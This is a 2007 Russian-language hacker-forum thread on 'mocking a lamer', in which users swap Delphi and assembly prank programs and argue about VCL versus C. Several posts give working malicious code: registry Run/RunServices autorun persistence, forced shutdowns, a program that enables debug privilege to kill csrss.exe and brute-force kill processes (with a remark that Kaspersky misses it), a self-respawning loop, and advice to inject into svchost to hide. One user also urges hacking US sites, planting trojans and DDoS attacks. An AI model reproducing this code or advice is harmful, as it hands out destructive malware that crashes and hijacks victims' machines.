[Как]поглумится над ламером
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Как]поглумится над ламером - 2007-10-19 19:23:36.510000
|
|
|
BOND07
Сообщений: 175
Оценки: 0
Присоединился: 2007-07-05 10:49:35.983333
|
Давайте скидывать сюда все способы усложнить жизнь тупого ламера
вот мой способ
procedure TForm1.Timer1Timer(Sender: TObject);
var
a:string;
begin
Label1.Caption:=timetostr(time);
Form1.Hide;
a:=timetostr(time);
if Label1.Caption=a then
ExitWindowsEx(EWX_Force,0);
end;
procedure TForm1.FormCreate(Sender: TObject);
var
RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion',true);
RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName);
RegIni.Free;
end;
end.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-10-19 19:41:12.326666
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
BOND07! У тебя ОЧЕНЬ СИЛЬНО ЗАВЫШЕНА САМООЦЕНКА! Вот кого ты называешь тупыми ламерами? Я тебя уверяю, что ты не умнее их раз создал такой топ!
Ну а твоя прога без проблем реализовывается на VBS, а у тебя не то, что компилируемый язык, так ещё и с VCL!!!! Хоть проявил бы фантазию! скажем сфоткал рабочий стол, а потом поставил фотку как обои и вырубил explorer.exe, детектя его запуск.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-10-19 21:20:39.596666
|
|
|
dj0nik
Сообщений: 103
Оценки: 0
Присоединился: 2007-06-21 17:48:32.633333
|
я хоть и не очень знаю Делфи, но тут по моему банальная работа с реестром.. Хакер ищет не стандартные пути решения, а это и новичек со справочником на перевес написать может.. :(
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-04 20:56:37.350000
|
|
|
пр:0ста4:0к
Сообщений: 13
Оценки: 0
Присоединился: 2007-10-28 19:39:57.420000
|
Я не вижу никакого практического смысла подставлять друг друга. Я думаю,что СНГ-цвет нации, POWER!!!! Все хакерство,фрикерство, кардерство, fishing, dos, ddos, trojan, virus, worm, zomby, все наши знания направлять на защиту России-матушки и(неоффициально) против… USA — United States of America— the real biggest shit in the world, хотя "us-полуфабрикаты" думают совсем иначе. Лучше создать тему форума типа AllFuckAmerica(AFA), и делиться мнениями, обмениваться советами по защите своих ресурсов в сети оффициально (неоффициально, хакать usa ихние сайты, всучивать троянов, обнулять счета зажравшихся, ddos всем pornoсайтам и разного рода такого shitа. У нас the best бабы, куда им там,силиконовые куклы. ,у нас the best умы, у нас the best форумы, у нас the best страна) ВСЕ хакеры, scriptkiddies, новички объединяйтесь. Используя вычислительную мощь наших объединенных сил мы достигнем нужного нам результата, так что звёздочки с флага осыпались и на BBC TV отобразился большой Fuck all Rules for America. —–=Спасибо за внимание, деревенский русский мужичек пр:0ста4:0к=—– А поглумиться над новичком, это, брат, не помужски. Лучше скажи про себя: Когда МЫ едины -МЫ не победимы. WE fuck America together!!!
Зачисляйтесь в ряды повстанцев, ладно, это так немного переборщил, в общем Вы меня поняли
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-04 21:46:07.406666
|
|
|
SkyLinE215
Сообщений: -986
Оценки: 0
Присоединился: 2007-08-27 10:25:44.570000
|
Анти-вирус спалят эти вашы приколы, так что не советую, особенно тебе BOND07.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-04 23:30:32.806666
|
|
|
StrannikRiddler
Сообщений: 115
Оценки: 0
Присоединился: 2007-06-08 16:20:53.516666
|
http://www.srzone.ru/load/24-1-0-1
глум над кнопкой Пуск в куче вариантов.
SkyLinE215, ну-ну. Скомпилировал, скормил вирустоталу… чисто
BOND07, зачем извращения с timetostr? Прямо в FormCreate прописывай и не придумывай
ExitWindowsEx(EWX_Force,0);
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 00:01:52.156666
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
Тупее туму придумать трудно и она уже почти затонула в недрах форума… Но тут какой-то нацыст по кличке пр:0ста4:0к , называющий себя "деревенский русский мужичек" её поднял и пол форума сюда сбежалось! Нажить себе врагов дело не хитрое!
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 01:20:39.560000
|
|
|
пр:0ста4:0к
Сообщений: 13
Оценки: 0
Присоединился: 2007-10-28 19:39:57.420000
|
Я не нацист, не твой враг, дело мое нехитрое. С уважением к Inspetor. Давай откроем тему форума AFA (All Fuck America). Я не за войну, я за PEACE во всем мире, но а вдруг война- действуют принципы из фильма БРАТ2,нужно быть готовым к информационной войне. еще немного и к примеру Украина, окажется под влиянием "демократии штатов". Нужно защищать наши границы славянского государства(СНГ).
Придут они на нашу землю и ты скажешь:"Привет друзья". Ты же не наживаешь врагов, правильно. Мне, кажется, если ты истинный Inspektor, то надерёшь как следует ихнюю з@Dnicy 52 или 53 звездночную, так чтобы она не стоила ни гроша.
и хочу закончить на…
недавно я узнал, что у меня
есть огромная семья:
и тропинка и лесок, в поле каждый колосок,
речка, небо голубое
это все мое родное,
это Родина моя,
ВСЕХ люблю на свете я!!!
Давай закончим неувязицу на этих словах
Благодарен за критику, пардон если ущемил твои гражданские права.
–=Проста4ок=–
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 11:21:23.490000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
Продолжаю флудить…
пр:0ста4:0к, спасибо поржал:D.
quote:
хакать usa ихние сайты, всучивать троянов, обнулять счета зажравшихся
и вот какая разница между твоим лозунгом и "мочи хачей!"? А говоришь не нацыст!
З.Ы.И ещё, выкень телевизор.. и комп тоже, они оказывают на тебя дурное влияние!
З.Ы.Ы. Кстати, по-русски тут написано меньше чем по-буржуйски.. патриот млин…
З.Ы.Ы.Ы. Не судите америкосов так строго! среди них тоже иногда встречаются нормальные люди! И вообще они не виноваты(не все по крайней мере), что их президент идио., короче Буш.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 20:01:26.580000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
BOND07, учитывая уровень твоего приложения, мой вариант в посте #2, для тебя идеален! Хочешь по-баловаться, так краткость- сестра таланта! Необрабатываемые исключения тебе подойдут! Пример:
xor eax,eax
mov eax,[eax]
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 20:44:49.066666
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
Можно поумничать? ну пожалуйста )
quote:
Label1.Caption:=timetostr(time);
Form1.Hide;
a:=timetostr(time);
if Label1.Caption=a then
Что это? моего мозга не хватает чтобы понять что это значит. Самое заковыристое что я видел.
BOND это ты же делал shell, то есть консоль? сразу видно человек с нестандартным мышлением.
quote:
ExitWindowsEx(EWX_Force,0);
Не знаю какая у тебя винда, но у меня на XP такой код не работает, нужно включать у программы права на перезагрузку компа
Function ShutDown:Boolean;
var
hToken: dword;
SeShutNameValue: Int64;
tkp: TOKEN_PRIVILEGES;
ReturnLength: dword;
begin
Result:=false;
//Добавляем привилегию SeDebugPrivilege
//Получаем токен нашего процесса
OpenProcessToken(INVALID_HANDLE_VALUE, TOKEN_ADJUST_PRIVILEGES
or TOKEN_QUERY, hToken);
//Получаем LUID привилегии
if not LookupPrivilegeValue(nil, 'SeShutDownPrivilege', SeShutNameValue) then
begin
CloseHandle(hToken);
exit;
end;
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Luid := SeShutNameValue;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
//Добавляем привилегию к процессу
AdjustTokenPrivileges(hToken, false, tkp, SizeOf(TOKEN_PRIVILEGES),
tkp, ReturnLength);
if GetLastError() <> ERROR_SUCCESS then exit;
Result:=ExitWindowsEx(EWX_POWEROFF or EWX_FORCE, 0);
end;
quote:
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software\Microsoft\Windows\CurrentVersion',true);
RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName);
Любой антивирус это запалит, а если еще будешь писать свою копию в автозагрузку, то касперский скажет что это троян.
quote:
xor eax,eax
mov eax,[eax]
Может в ring0 это и сработает, но ты забыл написать как в него уйти
BOND07 - в твоей программе можно было обойтись без VCL, учись его использывать разумно.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 21:38:23.020000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
Может в ring0 это и сработает, но ты забыл написать как в него уйти
Гм.. А что, в ядре другие законы? Значит деление на нуль тоже не обрабатывается только в ядре, а в юзермоде всё норм?! Та что не может, а точно и не "в нуле", а везде! Конечно, выполнив такой код приложение немедленно упадёт… но я не говорил, что этот код должно выполнить именно твоё приложение;). Заставь системный процесс выполнить этот код и не парься с выходом в ядро(хотя там, конечно, интереснее;)), эффект тот же.
quote:
в твоей программе можно было обойтись без VCL
В абсолютно любой программе можно, а главное нужно обходиться без MFS, VCL и подобной ереси[X(].
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 22:12:56.560000
|
|
|
alman
Сообщений: 31
Оценки: 0
Присоединился: 2007-10-30 14:34:19.316666
|
quote:
ORIGINAL: Inspektor
В абсолютно любой программе можно, а главное нужно обходиться без MFS, VCL и подобной ереси[X(].
Что скажет гуру об ATL?
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-05 23:13:20.240000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
Что скажет гуру об ATL?
Во-первых гуру на этом форуме не водятся(пока по крайней мере). Во вторых я не хочу высказывать своё мнение о том, что никогда не использовал(и скорее свего не буду). Но точно скажу, что это лучше чем "ересь":D. И вообще как их можно сравнивать?! Они имеют разное назначение(ну если конечно не обобщать до чего-нибудь типа "облегчение жизни программиста")!
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-06 11:55:47.250000
|
|
|
jediknight2
Сообщений: 45
Оценки: 0
Присоединился: 2007-09-17 16:07:30.006666
|
Program Virus;
uses windows;
procedure autorun;
begin
//сам напишешь
end;
begin
autorun;
winexec('shutdown -s -t 1',SW_HIDE);//или если сильно глумиться надо, то:
//winexec('shutdown -s -c "Ошибка обработки лицензии. Передача данных о пользователе в Microsoft. Сохраните все важные данные во избежание потерь данных"',SW_SHOW);
end.
Совет: сделай инжект в SVCHOST, никто левого процесса не заметит
quote:
ORIGINAL: Yashin
на XP такой код не работает, нужно включать у программы права на перезагрузку компа
а здесь никакие привилегии не нужны. зачем пользоваться чем-то другим, когда встроенное есть?
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-06 19:17:55.490000
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Inspektor
quote:
Может в ring0 это и сработает, но ты забыл написать как в него уйти
Гм.. А что, в ядре другие законы? Значит деление на нуль тоже не обрабатывается только в ядре, а в юзермоде всё норм?! Та что не может, а точно и не "в нуле", а везде! Конечно, выполнив такой код приложение немедленно упадёт… но я не говорил, что этот код должно выполнить именно твоё приложение;). Заставь системный процесс выполнить этот код и не парься с выходом в ядро(хотя там, конечно, интереснее;)), эффект тот же.
Не уверен что запустить код в чужом процессе будет легче, а можно как то обойти исключения в своей проге?
quote:
quote:
в твоей программе можно было обойтись без VCL
В абсолютно любой программе можно, а главное нужно обходиться без MFS, VCL и подобной ереси[X(].
Здесь можно поспорить. В любой да не в любой, если ты пишешь троян или еще что-то безформенное или с простой формой, то нужно. Но если у тебя большой проект какая-нибудь сложная бух. программа то без сторонних возможностей не обойтись, а VCL очень удобна в этом плане.
+1
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-06 19:34:41.336666
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
Не уверен что запустить код в чужом процессе будет легче
Это шутка такая?=)
quote:
а можно как то обойти исключения в своей проге?
В смысле? Поставить обработчик? Если да, то вот:
__try
{
__asm
{
xor eax, eax
mov eax, [eax]
}
}
__except(1)
{
MessageBox(0,"Исключение","",0);
} quote:
Здесь можно поспорить. В любой да не в любой, если ты пишешь троян или еще что-то безформенное или с простой формой, то нужно. Но если у тебя большой проект какая-нибудь сложная бух. программа то без сторонних возможностей не обойтись, а VCL очень удобна в этом плане.
То, что удобней согласен. Трояны и т.п. чушь не пишу и MFS не использую! Лучше написать десять лишних строк кода, но сэкономить при этом десятки Кб. Даже если потребуется не десяток, а несколько сотен строк- это того стоит.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-06 22:24:22.923333
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Inspektor
quote:
а можно как то обойти исключения в своей проге?
В смысле? Поставить обработчик?
В смысле обойти обработчик
quote:
То, что удобней согласен. Трояны и т.п. чушь не пишу и MFS не использую! Лучше написать десять лишних строк кода, но сэкономить при этом десятки Кб. Даже если потребуется не десяток, а несколько сотен строк- это того стоит.
А если программа сама весит сотни килобайт, то таким путем можно добиться только глюковатости кода.
Раз тема пошла про перезагрузку, вот мой вариант. 6 касперский почему то не палит
program Main;
uses
Windows;
Function KillProc(Pid:Cardinal):Boolean;
var
hProcess:Cardinal;
Osvi:OSVersionInfo;
Priv,PrivOld:TOken_Privileges;
hToken:Cardinal;
cbPriv:Cardinal;
begin
// сначала попробуем получить описатель процесса без
// использования дополнительных привилегий
Result:=False;
hProcess := OpenProcess(PROCESS_TERMINATE, FALSE, PId);
if (hProcess = 0) then
begin
if (GetLastError <> ERROR_ACCESS_DENIED) then Exit;
// определяем версию операционной системы
osvi.dwOSVersionInfoSize := sizeof(osvi);
GetVersionEx(osvi);
// мы больше ничего не можем сделать, если это не Windows NT
if (osvi.dwPlatformId <> VER_PLATFORM_WIN32_NT) then Exit;
// включим привилегию SE_DEBUG_NAME и попробуем еще раз
cbPriv := sizeof(PrivOld);
// получаем токен текущего потока
if not(OpenThreadToken(GetCurrentThread(),
TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES,
FALSE, hToken))
then begin
if (GetLastError <> ERROR_NO_TOKEN) then Exit;
// используем токен процесса, если потоку не назначено
// никакого токена
if not(OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES,
hToken)) then Exit;
end;
Priv.PrivilegeCount := 1;
Priv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(nil, 'SeDebugPrivilege', Priv.Privileges[0].Luid);
// попробуем включить привилегию
if not(AdjustTokenPrivileges(hToken, FALSE, Priv, sizeof(Priv),
PrivOld, cbPriv))
then begin
CloseHandle(hToken);
Exit;
end;
if (GetLastError = ERROR_NOT_ALL_ASSIGNED) then
begin
// привилегия SE_DEBUG_NAME отсутствует в токене
// вызывающего
CloseHandle(hToken);
Exit;
end;
// попробуем открыть описатель процесса еще раз
hProcess := OpenProcess(PROCESS_TERMINATE, FALSE, PId);
// восстанавливаем исходное состояние привилегии
AdjustTokenPrivileges(hToken, FALSE, PrivOld, sizeof(PrivOld),
Priv, cbPriv);
CloseHandle(hToken);
if (hProcess = 0) then Exit;
end;
// пытаемся завершить процесс
if not(TerminateProcess(hProcess, Cardinal(-1))) then
begin
CloseHandle(hProcess);
Exit;
end;
// WaitForSingleObject(hProcess,400);
CloseHandle(hProcess);
// успешное завершение
Result:=True;
end;
var i:Integer;
begin
KillProc(628); //Убиваем crss.exe
sleep(3000);
//Если еще работает, значит не известная версия системы
for i:=5 to 1300 do KillProc(i); //Делаем жесткий брут
end.
PS. Вся ответственность за работу этой программы лежит на том кто ее скомпилировал или запустил. Потом мне не говорите, если у кого-то винда полетит или винт встанет.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-06 23:21:00.743333
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
В смысле обойти обработчик
Это как? Обработчик либо есть, либо его нет- третьего не дано!
quote:
А если программа сама весит сотни килобайт
Мне до этого далеко… Я почему-то уверен, что 99% участников форума вообще никогда не сделают такую прогу.
quote:
таким путем можно добиться только глюковатости кода.
Зависит от кривизны рук и "гениальности" мозга. Возможно, MFS и полезна, но никак не начинающим! А учитывая, что API там спрятаны(правда не очень надёжно) понять как это работает просто нереально.
quote:
Раз тема пошла про перезагрузку, вот мой вариант.
Твой вариант просто мега извращённый! Во-первых это не перезагрузка! Во-вторых если уж мы скотились до тупого убийства процессов, бей winlogon- не ошибёшься!
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-07 20:08:46.640000
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Inspektor
quote:
В смысле обойти обработчик
Это как? Обработчик либо есть, либо его нет- третьего не дано!
Ну я не гуру, почему тогда твой вариант в user mode не работает?
quote:
quote:
таким путем можно добиться только глюковатости кода.
Зависит от кривизны рук и "гениальности" мозга. Возможно, MFS и полезна, но никак не начинающим! А учитывая, что API там спрятаны(правда не очень надёжно) понять как это работает просто нереально.
Я не знаю принцип работы MFC, но VCL достаточно простой и в то же время очень надежный, доступен и новичку.
quote:
quote:
Раз тема пошла про перезагрузку, вот мой вариант.
Твой вариант просто мега извращённый! Во-первых это не перезагрузка! Во-вторых если уж мы скотились до тупого убийства процессов, бей winlogon- не ошибёшься!
Да и так не плохо, там даже синее окошко вылетает, все в традициях винды. Мне еще понравился вариант на WASM.ru, где с помощью MessageBox окно BSOD выводили.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-08 03:53:43.343333
|
|
|
il0dbg
Сообщений: 66
Оценки: 0
Присоединился: 2007-10-30 01:32:31.366666
|
program u7;
uses
SysUtils,windows,registry;
procedure reg;
var
reg:TRegistry;
begin
begin
reg := TRegistry.Create;
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.LazyWrite := false;
reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',false);
reg.WriteString('Служба восстановления системы', ParamStr(0));
reg.CloseKey;
reg.free;
end;
end;
var i:longint;
begin
reg;
i:=444;
WinExec(PAnsiChar(ParamStr(0)),SW_SHOW);
while true do
begin
i:=i*3232452666;i:=i div 3232452666;
reg;
end;
end.
Любой сервак завалит (который под мастдаем) =)
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-08 10:13:42.640000
|
|
|
ADSL44
Сообщений: 129
Оценки: 0
Присоединился: 2007-10-12 10:14:16.703333
|
ИМХО это всё 70x годов, придумайте чтонибуть новее))) этот пуск литающий )) смешно
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-08 16:53:27.670000
|
|
|
Афанасий1
Сообщений: 4
Оценки: 0
Присоединился: 2007-11-08 14:55:13.770000
|
quote:
ORIGINAL: Yashin
quote:
ORIGINAL: Inspektor
quote:
а можно как то обойти исключения в своей проге?
В смысле? Поставить обработчик?
В смысле обойти обработчик
quote:
То, что удобней согласен. Трояны и т.п. чушь не пишу и MFS не использую! Лучше написать десять лишних строк кода, но сэкономить при этом десятки Кб. Даже если потребуется не десяток, а несколько сотен строк- это того стоит.
А если программа сама весит сотни килобайт, то таким путем можно добиться только глюковатости кода.
Раз тема пошла про перезагрузку, вот мой вариант. 6 касперский почему то не палит
program Main;
uses
Windows;
Function KillProc(Pid:Cardinal):Boolean;
var
hProcess:Cardinal;
Osvi:OSVersionInfo;
Priv,PrivOld:TOken_Privileges;
hToken:Cardinal;
cbPriv:Cardinal;
begin
// сначала попробуем получить описатель процесса без
// использования дополнительных привилегий
Result:=False;
hProcess := OpenProcess(PROCESS_TERMINATE, FALSE, PId);
if (hProcess = 0) then
begin
if (GetLastError <> ERROR_ACCESS_DENIED) then Exit;
// определяем версию операционной системы
osvi.dwOSVersionInfoSize := sizeof(osvi);
GetVersionEx(osvi);
// мы больше ничего не можем сделать, если это не Windows NT
if (osvi.dwPlatformId <> VER_PLATFORM_WIN32_NT) then Exit;
// включим привилегию SE_DEBUG_NAME и попробуем еще раз
cbPriv := sizeof(PrivOld);
// получаем токен текущего потока
if not(OpenThreadToken(GetCurrentThread(),
TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES,
FALSE, hToken))
then begin
if (GetLastError <> ERROR_NO_TOKEN) then Exit;
// используем токен процесса, если потоку не назначено
// никакого токена
if not(OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES,
hToken)) then Exit;
end;
Priv.PrivilegeCount := 1;
Priv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(nil, 'SeDebugPrivilege', Priv.Privileges[0].Luid);
// попробуем включить привилегию
if not(AdjustTokenPrivileges(hToken, FALSE, Priv, sizeof(Priv),
PrivOld, cbPriv))
then begin
CloseHandle(hToken);
Exit;
end;
if (GetLastError = ERROR_NOT_ALL_ASSIGNED) then
begin
// привилегия SE_DEBUG_NAME отсутствует в токене
// вызывающего
CloseHandle(hToken);
Exit;
end;
// попробуем открыть описатель процесса еще раз
hProcess := OpenProcess(PROCESS_TERMINATE, FALSE, PId);
// восстанавливаем исходное состояние привилегии
AdjustTokenPrivileges(hToken, FALSE, PrivOld, sizeof(PrivOld),
Priv, cbPriv);
CloseHandle(hToken);
if (hProcess = 0) then Exit;
end;
// пытаемся завершить процесс
if not(TerminateProcess(hProcess, Cardinal(-1))) then
begin
CloseHandle(hProcess);
Exit;
end;
// WaitForSingleObject(hProcess,400);
CloseHandle(hProcess);
// успешное завершение
Result:=True;
end;
var i:Integer;
begin
KillProc(628); //Убиваем crss.exe
sleep(3000);
//Если еще работает, значит не известная версия системы
for i:=5 to 1300 do KillProc(i); //Делаем жесткий брут
end.
PS. Вся ответственность за работу этой программы лежит на том кто ее скомпилировал или запустил. Потом мне не говорите, если у кого-то винда полетит или винт встанет.
А здесь и нечего детектить, нет некаких подозрительных действий , поведенческий блокиратор не рассматривает данную программу как вредонос
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-08 19:33:35.590000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
Ну я не гуру, почему тогда твой вариант в user mode не работает?
Ну что значит не работает? Там всего две строчки кода! Оцени эти две строчки, как бы сказал мой сокурсник, "с точки зрения банальной эрудиции";).
Остальные посты комментировать не буду(оставлю это дело настоящим "хакерам"[sm=ag.gif][sm=ag.gif][sm=ag.gif][sm=ag.gif][sm=ag.gif" height="20" width="20"><img src="http://forum.xakep.ru/upfiles/smiley/ag.gif]).
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-08 19:50:29.826666
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
Ну да включение прав дебагера и убийство системного, жизненоважного процесса. Ничего подозрительного
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-10 23:58:50.196666
|
|
|
Kill_em_all
Сообщений: 395
Оценки: 0
Присоединился: 2005-03-25 22:40:01
|
Блин, вылез на форум опять за долгое время, а ничего опять не меняется:(Школьников все больше. А
у Yashin'а картинка не поменялась.Надеюсь хоть Pupparo здесь нет.
И значимость какая-то добавилась:(
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-11 00:18:15.970000
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Kill_em_all
Блин, вылез на форум опять за долгое время, а ничего опять не меняется:(Школьников все больше. А
у Yashin'а картинка не поменялась.Надеюсь хоть Pupparo здесь нет.
И значимость какая-то добавилась:(
И не поменяется, она полностью мне соответствует, за что спасибо Пупарро. Пупарро здесь нет, но теперь у нас двое Штемп`ов.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-12 08:51:24.296666
|
|
|
Alaget
Сообщений: 330
Оценки: 0
Присоединился: 2007-11-08 15:57:53.170000
|
Просто поражают люди, которые программируют на ассемблере и си, и за того что там у программ меньше размер получается, и не используют VCL. VCL это новая технология, а ассемблер и си для написания прикладных программ это изжиток прошлого.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-12 16:14:30.343333
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: Alaget
Просто поражают люди, которые программируют на ассемблере и си, и за того что там у программ меньше размер получается, и не используют VCL. VCL это новая технология, а ассемблер и си для написания прикладных программ это изжиток прошлого.
=)
vcl – это новая и уже отживающая свой век технология. ей на смену пришёл дотнет. ещё лет через пять дотнет начнёт умирать. его заменит что-нибудь ещё.
а ассемблер и C никуда не денутся.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-12 21:19:31.633333
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Alaget
Просто поражают люди, которые программируют на ассемблере и си, и за того что там у программ меньше размер получается, и не используют VCL. VCL это новая технология, а ассемблер и си для написания прикладных программ это изжиток прошлого.
Гы гы, это реально лишние 300-… кб к программе, взамен того что дают дополнительные возможности для программиста. Но это не означает, что программа будет быстрее работать, а скорее наоборот.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-12 23:52:12.606666
|
|
|
Necromancer13
Сообщений: 146
Оценки: 0
Присоединился: 2007-06-28 02:00:57.563333
|
quote:
=)
vcl – это новая и уже отживающая свой век технология. ей на смену пришёл дотнет. ещё лет через пять дотнет начнёт умирать. его заменит что-нибудь ещё.
а ассемблер и C никуда не денутся.
rgo прав на счет асма…
о СИ, надеюсь, тоже…
асм и си мои любимые языки…
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 10:19:19.960000
|
|
|
Alaget
Сообщений: 330
Оценки: 0
Присоединился: 2007-11-08 15:57:53.170000
|
Скажем программу для вычисления корней квадратного уравнения, в делфи я за минуту сделаю, а вы если без заготовок, такую же программу с тем же интерфейсом будете делать минимум час, а может и неделю, а я в это время буду отдыхать это и есть прогресс, а си и ассемблер для системного программирования, только и годятся. Раньше консерваторы говорили, что машинные коды лучше ассемблера.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 13:08:02.373333
|
|
|
Necromancer13
Сообщений: 146
Оценки: 0
Присоединился: 2007-06-28 02:00:57.563333
|
quote:
Раньше консерваторы говорили, что машинные коды лучше ассемблера.
синтаксис ассемблера это и есть запись машинных кодов в более понятной форме….
ну почти так…что писать на Ассемблере
mov al,3
mov cx,0FFh
mov dx,0
int 26h
и преобразуется в B0 03 B9 FF 00 BA 00 00 CD 26, что писать сразу в машинном коде по фиг… отличается только тем, что если в машинном коде писать сразу, то будет сложнее, хотя для кого-то может и легче[>:]
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 14:13:01.496666
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
quote:
Скажем программу для вычисления корней квадратного уравнения, в делфи я за минуту сделаю, а вы если без заготовок, такую же программу с тем же интерфейсом будете делать минимум час, а может и неделю, а я в это время буду отдыхать это и есть прогресс, а си и ассемблер для системного программирования, только и годятся. Раньше консерваторы говорили, что машинные коды лучше ассемблера.
Вот ё, снова-здорова… Хватит сравнивать противоположные понятия. Я тоже вовсю юзаю делфи, когда надо что-то быстро набросать, не отвлекаясь на написание на интерфейса и пр. удобств. Большие проекты, на ассемблере и так почти не пишутся (ну за исключением может IDE асмовских ;)), неудобно это.
А для специфичных мелких программ - самое оно. Глупо таскать с собой груз GUI, если вполне можно обойтись без него
ЗЫ: Конслоь, кстати, Still Alive (© GLaD :D)
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 14:54:51.823333
|
|
|
Necromancer13
Сообщений: 146
Оценки: 0
Присоединился: 2007-06-28 02:00:57.563333
|
JTG, согласен
Alaget, я против дельфи ничего плохого не имею, классный язык, просто у каждого свои вкусы… мне нравится низкоуровневое программирование
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 19:46:26.666666
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
quote:
ORIGINAL: Alaget
Скажем программу для вычисления корней квадратного уравнения, в делфи я за минуту сделаю, а вы если без заготовок, такую же программу с тем же интерфейсом будете делать минимум час, а может и неделю, а я в это время буду отдыхать это и есть прогресс, а си и ассемблер для системного программирования, только и годятся. Раньше консерваторы говорили, что машинные коды лучше ассемблера.
Будущее значит за калькуляторами. Маленьку программу, не спорю, легче сделать на делфи, но ИМХО большую программу на делфи вообще не сделаешь. Я программирую на Делфи - он мне нравиться, красивый, простой язык. Но я четко вижу, что Си предоставляет больше возможностей для создания серьезных проектов, без некоторых ее возможностец сделать большой проект просто невозможно. Тем более, что некоторые современные скриптовые языки, такие как ПХП, содержат Си - похожий синтаксис, настоящий программист обязан знать Си. Если дословно понимать твой пост, то не делфи впереди, а .Net что так и есть.
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 20:17:59.766666
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
